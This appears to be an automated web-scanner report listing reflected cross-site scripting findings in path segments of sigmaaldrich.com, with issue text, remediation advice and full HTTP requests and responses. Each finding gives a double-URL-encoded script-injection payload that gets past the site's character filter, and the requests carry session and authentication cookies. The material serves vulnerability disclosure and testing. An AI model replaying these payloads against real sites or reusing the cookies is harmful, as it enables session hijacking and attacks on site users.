Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:54 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcc89b7";alert(1)//87ad3930ee4/medialib/labware/labware-icons/filtration","E404") ;
   </script>
...[SNIP]...

1.364. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb029%2522%253balert%25281%2529%252f%252f53b8e84c150 was submitted in the REST URL parameter 2. This input was echoed as cb029";alert(1)//53b8e84c150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibcb029%2522%253balert%25281%2529%252f%252f53b8e84c150/labware/labware-icons/filtration HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:55 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibcb029";alert(1)//53b8e84c150/labware/labware-icons/filtration","E404") ;
   </script>
...[SNIP]...

1.365. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dfe4%2522%253balert%25281%2529%252f%252f511511f42c6 was submitted in the REST URL parameter 3. This input was echoed as 9dfe4";alert(1)//511511f42c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware9dfe4%2522%253balert%25281%2529%252f%252f511511f42c6/labware-icons/filtration HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:57 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware9dfe4";alert(1)//511511f42c6/labware-icons/filtration","E404") ;
   </script>
...[SNIP]...

1.366. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb7e%2522%253balert%25281%2529%252f%252fdfecbe76f2d was submitted in the REST URL parameter 4. This input was echoed as edb7e";alert(1)//dfecbe76f2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsedb7e%2522%253balert%25281%2529%252f%252fdfecbe76f2d/filtration HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsedb7e";alert(1)//dfecbe76f2d/filtration","E404") ;
   </script>
...[SNIP]...

1.367. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c455%2522%253balert%25281%2529%252f%252fbd9558297d4 was submitted in the REST URL parameter 5. This input was echoed as 1c455";alert(1)//bd9558297d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/filtration1c455%2522%253balert%25281%2529%252f%252fbd9558297d4 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/filtration1c455";alert(1)//bd9558297d4","E404") ;
   </script>
...[SNIP]...

1.368. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/gas-equipment [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/gas-equipment

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c68%2522%253balert%25281%2529%252f%252f747b3286d23 was submitted in the REST URL parameter 1. This input was echoed as d0c68";alert(1)//747b3286d23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcd0c68%2522%253balert%25281%2529%252f%252f747b3286d23/medialib/labware/labware-icons/gas-equipment HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
